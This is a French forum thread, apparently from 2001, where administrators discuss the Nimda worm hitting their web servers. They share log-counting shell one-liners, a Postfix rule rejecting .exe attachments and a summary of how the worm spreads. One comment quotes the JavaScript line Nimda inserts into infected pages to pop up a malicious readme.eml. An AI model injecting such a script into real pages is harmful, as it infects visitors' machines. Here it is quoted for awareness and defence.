Je confirme, ca tape fort dans les logs !
[^] # Re: Mes logs vont exploser ;-)
Posté par Talou (site web personnel) . Évalué à 2.
J'avais pas lu avant !!!
[^] # Re: Mes logs vont exploser ;-)
Posté par Talou (site web personnel) . Évalué à 2.
# cat /var/log/httpd/access* |grep root.exe |wc -l
Par contre, comment fait-on pour distinguer les requêtes ? c-à-d savoir combien d'ip uniques ?
# hum hum
Posté par julien . Évalué à -4.
heu..cette remarque a propos de l'attentat est-elle vraiment la bienvenue ....?
----------------------------------------------
j'ai comme un doute
# Contre-attaque ?
Posté par Eric Leblond (site web personnel) . Évalué à -2.
Code Red I permettait en effet d'attaquer le "serveur de son choix". Cette nouvelle version pourrait ainsi permettre l'attaque des sites terroristes.
On va ainsi peut-etre voir une union sacré des serveurs IIS dans la lutte contre le terrorisme ;-)
[^] # Re: Contre-attaque ?
Posté par Anonyme . Évalué à 2.
D'autant plus que la propagation de ce type de ver est plus une méthode terroriste que quoi ce soit d'autre.
# Sites WEB infectés
Posté par Philippe Martin . Évalué à 3.
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
est insérée à la fin de la page de garde, et un fichier readme.eml est ajouté à la racine. Ce qui vous ouvre une belle fenêtre avec un README.EXE en attachement. De là à cliquer, il n'y a qu'un neuneu^H^H^H^H^H^Hpas.
-
Feloy - Ah zut, j'suis déjà identifié
[^] # Re: Sites WEB infectés
Posté par Gloo . Évalué à 1.
Dommage que tu as mis cette phrase entre parenthèse. Il faut insister sur le fait que le problème vient des produits microsoft et non pas de javascript.
# Les IPs heure par heure
Posté par Lol Zimmerli (site web personnel, Mastodon) . Évalué à 1.
Un script, posé dans /etc/cron.hourly/
---
#!/bin/bash
cat /var/log/httpd/error_log|grep script |cut -d " " -f 8 | uniq|sort|uniq|sed s/\]//g > /usr/local/www/html/monsite/ms_virii.txt
---
(bien sûr, il ne doit pas y avoir le retour à la ligne)
Le résultat: http://www.lzi.ch/ms_virii.txt(...)
La gelée de coings est une chose à ne pas avaler de travers.
[^] # euh...
Posté par Anonyme . Évalué à 0.
[^] # Re: Les IPs heure par heure
Posté par Foxy (site web personnel) . Évalué à 1.
Le malheur, c'est que parmi ces 195 IP, beaucoup sont dans le même sous-réseau que moi (celui de mon hébergeur).
Depuis 6h50, ce matin, 75 IP différentes ont tenté les mêmes requêtes.... Ras le bol de ces vers IIS !!!!
[^] # Re: Les IPs heure par heure
Posté par Foxy (site web personnel) . Évalué à 2.
cat /var/log/httpd/error_log|grep script |cut -d " " -f 8 |sort|uniq|sed s/\]//g c'est mieux.
[^] # Re: Les IPs heure par heure
Posté par Lol Zimmerli (site web personnel, Mastodon) . Évalué à 1.
La gelée de coings est une chose à ne pas avaler de travers.
[^] # Re: Les IPs heure par heure
Posté par Jerome Demeyer . Évalué à 1.
grep scripts ==> grep system32
uniq|sort|uniq ==> sort -u
[^] # et tant qu'a faire...
Posté par Anonyme . Évalué à 0.
[^] # Re: Les IPs heure par heure
Posté par gle . Évalué à 2.
Par contre je ne vois pas l'utilité de faire un cat vers un pipe quand grep sait lire les fichiers comme un grand. Donc moi je dis:
grep script /var/log/httpd/error_log|cut -d" " -f8|uniq|sort|uniq|sed s/\]//g
[^] # Re: Les IPs heure par heure
Posté par Tony Flow . Évalué à 9.
total du nombre d'attaques :
grep c+dir access_log -c
total du nombre d'ip differentes :
grep c+dir access_log | cut -d " " -f 1 | sort | uniq -c | wc -l
liste des ips triées selon leur occurence :
grep c+dir access_log | cut -d " " -f 1 | sort | uniq -c | sort
nombre d'attaques heures par heures :
grep c+dir access_log | cut -d " " -f 4 | cut -d ":" -f 1,2 | uniq -c
nombre d'ip différentes jour après jour :
grep c+dir access_log | awk -F " " '{print $4 ": " $1}' | cut -d ":" -f 1,5 | sort | uniq | cut -d ":" -f 1 | uniq -c
à vos stats !
[^] # Re: Les IPs heure par heure
Posté par Talou (site web personnel) . Évalué à 2.
Dommage que je n'ai plus de vote en réserve aujourd'hui !
[^] # Re: Les IPs heure par heure
Posté par Pascal Terjan (site web personnel) . Évalué à 2.
grep c+dir access_log | cut -d " " -f 4 | cut -d ":" -f 1,2 | sed -e 's/\[//' | uniq -c
histoire de virer le [ c'est plus joli :)
pareil par jour...
grep c+dir access_log | awk -F " " '{print $4 ": " $1}' | cut -d ":" -f 1,5 | sort | uniq | cut -d ":" -f 1 | sed -e 's/\[//' | uniq -c
# Newsletter de Secuser (Nimda)
Posté par Jean-Philippe SOUQUE (site web personnel) . Évalué à 4.
Nimda est un virus de mail qui se présente sous la forme d'un message dont le titre est aléatoire, accompagné d'un fichier joint généralement nommé README.EXE. Si ce fichier est exécuté, le virus s'auto-envoie aux correspondants présents dans la boîte de réception, grâce à son propre serveur SMTP. Sur un serveur web Microsoft IIS non patché contre la vulnérabilité "Unicode Web Traversal", Nimda modifie les pages en .HTM, .HTML et .ASP pour que les internautes qui visitent les sites hébergés sur ce serveur se voient proposer de télécharger un mail contenant le virus. Particulièrement virulent, Nimda tente de saturer les serveurs de mail, mais peut également scanner massivement le port 80 des serveurs web et provoquer ainsi ponctuellement des dénis de service. Les administrateurs concernés doivent de toute urgence appliquer le patch correctif.
# Probleme chez les providers ?
Posté par swix . Évalué à 0.
[^] # Re: Probleme chez les providers ?
Posté par PLuG . Évalué à 1.
IL faut maintenir l'os des équipements réseau a jour au meme titre que l'os des serveurs !!
[^] # Re: Probleme chez les providers ?
Posté par Anonyme . Évalué à 2.
[^] # Re: Probleme chez les providers ?
Posté par Anonyme . Évalué à 0.
# Pour les utilisateurs de Postix
Posté par Etienne Roulland . Évalué à 5.
Propagation via email can be stopped with:
/etc/postfix/main.cf:
body_checks = regexp:/etc/postfix/body_checks
/etc/postfix/body_checks:
/^[SPACE TAB]*name=.*\.exe/ REJECT
# Ras le bol de IIS !
Posté par Nico . Évalué à 1.
Ce qui me chagrine encore plus, c'est que Netcraft nous sort depuis 2 mois mainteannt des stats qui montrent une augmentation du nombre de serveurs tournant sous IIS.
Je trouve ça Halucinant !
Si c'est du temps pour une migration d'un web serveur à un autre qui fait peur aux Entreprises, qu'elles etudient la solution une bonne fois pour toute, et qu'on en parle plus !
En attendant, elles perdent du temps; de l'argent, et pénalise les autres boites et leurs clients (comme on peut le voie avec Nimba )...
Un parfait exemple de ce que le monopole de MS peut provoquer.
Faites confiance au libre bon sang !
Nico
[^] # Re: Ras le bol de IIS !
Posté par Nicolas GORALSKI . Évalué à 2.
Donc il y a probleme de responsabilité et de volonté de rapidité/cout de mise en place.
De plus combien de boite passe par des sociétés extérieur pour avoir juste le serveur web NT/IIS sans la maintenance, derrière juste pour les pannes hard ou soft. Mais la il n'y a pas d'arrêt de service, mais de la pollution de réseau.
La les lugs peuvent proposer des services de prestations auprès des entreprises pour auditer les besoins et les satisfaire avec des logiciels libres et sécurisé.
[^] # Re: Ras le bol de IIS !
Posté par oliv . Évalué à 1.
Juillet: http://www.securityspace.com/s_survey/data/200107/index.html(...)
Août: http://www.securityspace.com/s_survey/data/200108/index.html(...)
Concernant IIS, Netcraft a montré dans son ancien rapport, que ces vers ont pour effet de forcer les admins à patcher leurs IIS, donc à boucher les trous... Bref, grâce aux vers, IIS devient plus sûr, paradoxal, non? ;)
# attaques...
Posté par concoillotte . Évalué à -1.
d'après cette url, il s'agirait d'un nouveau ver nommé Nimda.
il exploiterait les mêmes failles que code red et aussi les backdoors laissés par ce dernier ainsi que les extensions frontpage.
il possède différents modes de propagation :
serveur-client
client-serveur
client-client (e-mail et partages réseaux)
...
# Un petit résumé
Posté par Gauthier (Mastodon) . Évalué à 10.
Méthodes de diffusion :
- style codered (attaque directe de Microsoft/IIS, mais il utilise de nombreuses vulnérabilités de IIS au lieu d'une seule.
- fichier attaché mail. Certaines versions d'outlook exécutent le fichier directement à la lecture du mail, aucune action de l'utilisateur
n'est nécessaire.
- page web infectée, certaines versions de Internet Explorer exécutent directement le script attaché à une page web issue d'un serveur infecté.
La machine cliente s'infecte lors d'une simple navigation.
- répertoires partagés anonymes windows (guest/sans mot de passe, très courant dans les bureaux pour s'échanger des documents).
Une fois une machine infectée, il essaye de se répandre par tous les moyens : scans de serveurs web distants, envois massifs de mail,
infection des pages web sur le site infecté, ouverture du C: en répertoire partagé sans protection, attaque des partages sur le
voisinage réseau.
La diversité des méthodes d'attaque fait qu'il passe facilement les firewalls, une surveillance accrue est donc nécessaire pour éviter sa
diffusion en masse.
Les sites qui ont mis en place un firewall, utilisant apache ou iplanet comme serveur web et une machine non windows comme passerelle mail ne
répandront à priori pas l'infection si une de leur machine est compromise (le firewall évite l'envoi direct de mail par les clients windows, apache et iplanet ne peuvent pas être compromis, la passerelle non plus).
Les sites ayant des machines windows connectées directement sur internet sont très vulnérables. Il est en effet quasiment impossible de maintenir
un parc entier de machines à jour des correctifs de sécurité de Microsoft. Ces sites doivent être particulièrement vigilants.
Quelques suggestions :
- mettre en place un firewall qui protège des attaques directes
- utiliser un serveur web professionnel (apache)
- ne pas utiliser Outlook (il existe de nombreuse passerelles webmail qui ne sont pas vulnérables, ou du moins qui nécessitent une action volontaire de l'utilisateur pour infecter la machine cliente)
- ne pas utiliser Internet Explorer, utilisez plutot netscape ou Mozilla qui ne sont pas vulnérables.
- eviter les répertoires partagés windows, ou du moins les mettre sur un serveur samba, non vulnérable
- prévenir et éduquer les utilisateurs sur comportement à avoir devant un mail douteux et devant _tout_ fichier attaché
De très nombreuses machines sont déjà compromises, soyez donc extrêmement vigilants.
Plus d'informations sur :
http://www.incidents.org/react/nimda.php(...)
Incidents.org qui est repassé en code d'alerte jaune
http://www.securityfocus.org/(...)
http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html(...)
sarc.com qui classe nimda en catégorie 4, la plus dangereuse
[^] # Re: Un petit résumé
Posté par julien . Évalué à 1.
quelqu'un connait un autre mail client capable d'attaquer hotmail ?? parce que j'ai un compte sous hotmail depuis....avant que bill l'achete, et je voudrais passer a un autre appli, mais j'ai ce probleme
[^] # Outlook et mailer
Posté par kadreg . Évalué à 3.
MS a inventé un protocole permettant de rapatrier les mails depuis hotmail (en passant par le HTTP) sur outlook. Il n'est pas documenté du tout, c'est juste un truc pour lier hotmail et outlook et dire que outlook c'est le meilleurs, c'est le seul a pouvoir faire ca.
outlook su>< AUSSI pour ça.
[^] # hotmail
Posté par Gloo . Évalué à 1.
http://www.securityfocus.com/templates/headline.html?id=12486(...)
cf aussi la section Related Stories
Encore une fois ce n'est pas javascript le coupable, mais bien microsoft.
[^] # Re: Un petit résumé
Posté par Jak . Évalué à 2.
Ben voyons... Et la marmotte, elle met le chocolat dans le papier alu...
Depuis "Melissa" et "I Love You", on n'arrête pas de le répéter, mais vas-t-en faire comprendre ça à un crét^H^H^H^Hutilisateur de base. J'ai laissé tomber, ça ne sert à rien. C'est juste une question de bon sens, mais en général, tu passes pour un paranoïaque.
[^] # Re: Un petit résumé
Posté par kadreg . Évalué à -1.
Linux, une nouvelle methode de securité informatique :)
[^] # Si c'était aussi simple :)
Posté par Jak . Évalué à 0.
Vu comme ça, c'est mal barré :)
[^] # Re: Un petit résumé
Posté par oliv . Évalué à 2.
Je tiens à préciser que le gars qui a écrit ça n'est pas un idiot, ni quelqu'un d'antipathique, mais je soupçonne qu'il doit appliquer des décisions venant de plus haut.
J'ai volontairement caché/coupé/censuré certaines infos. Juste les meilleures lignes.
"Dans le but d'améliorer le service de messagerie et offrir de nouvelles fonctionnalités dans les mois qui suivent, ***** va procéder à l'installation de nouveaux serveurs de messagerie (passage à Exchange 2000).
[...]
***** profite aussi de rappeler ou d'annoncer pour ceux qui ne le savent pas encore que les clients de messagerie conseillés et supportés sont Outlook (sur les plate-formes Windows et MacOS) et Webmail.
Netscape doit être abandonné le plus rapidement possible au profit de Outlook car Netscape a depuis longtemps de gros problèmes pour afficher
certains fichiers attachés et pour effacer correctement les messages, en fait il les cache le plus souvent et de nombreuses boîtes aux lettres
arrivent tôt ou tard à saturation!
[...]"
Bref, on n'est pas dans le caca... :-(
Ces gars utilisaient VMS avant, juste pour préciser encore que ce ne sont pas des idiots.
[^] # doit y avoir de ces dessous de table....
Posté par Anonyme . Évalué à -1.
# le nicopatch microsoft (C) (R) (TM)
Posté par Noe Reboul . Évalué à 1.
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/(...)
visiblement si vous avez patché pour Code Red II et que vous avez les patchs à jour vous craignez rien ...
# Pour faire avancer le schmilblik !!:
Posté par Damien Berjoan . Évalué à 1.
permettant de scanner et réparer les partitions windows infectées.
Pour l'instant je scanne et désinfecte à distance avec viruscan pour Linux et samba, mais ce serait
plus rapide et plus simple si j'étais en local, surtout que ce virus rajoute des dll (Admin.dll)
avec le virus sur toutes les partitions infectés sauf que viruscan ne peut pas le désinfecter car il est utilisé par le virus normal :-)
Donc avis aux spécialistes qui pourraient m'aider.
Merci.
# Vérification du patchage...
Posté par David Pradier . Évalué à 1.
Pour conclure que ce ver nommé Nimda /admin à l´envers/ ait été lancé pour faire des stats sur le patchage des serveurs, il n´y a qu´un pas à faire... ;-)
Ce ver prouve seulement noir sur blanc, avec des statistiques, que (<TROLL> l´ensemble des admins et l´ensemble des neuneus se recoupe...</TROLL>) même après une attaque majeure, il reste de la place pour lancer une deuxième attaque majeure...
C´est pas gai.
# Les medias....
Posté par Gloo . Évalué à 2.
* France info dit :"[nimda] a infecté des serveurs professionnels par centaines de milliers"
* la news de fr.yahoo.com qui explique que c'est "java" qui est une des causes de tout ca et nom pas le système d'exploitation windows, et outlook , et IIS, qui sont trois produits microsoft.
Je vois à present des "J'ai lu que c'était certainement à cause de Java" et toute la clic de le "net c'est pas net"....
Par pitié, lors des discussions famille/amis/boulot, si vous ne provoquez pas la discussion sur ce sujet et qu'il se presente, informez ! Si vous connaissez un/des journaliste(s) idem.
Je ne parle pas d'en discuter entre nous ( qui savons ), mais d'informer le grand publique: celui qui regarde tf1 à la télé, ecoute france info dans sa voiture, et lit yahoo au boulot.
forum zdnet : http://forums.zdnet.fr/forum/read.php3?f=3&i=4018&t=4018(...)
new yahoo : http://fr.news.yahoo.com/010919/1/1vnv7.html(...)
[^] # Re: Les medias....
Posté par Lol Zimmerli (site web personnel, Mastodon) . Évalué à 2.
Ceux-là, ça fait longtemps que je ne les vois même plus ;-)
La gelée de coings est une chose à ne pas avaler de travers.
Suivre le flux des commentaires
Note : les commentaires appartiennent à celles et ceux qui les ont postés. Nous n’en sommes pas responsables.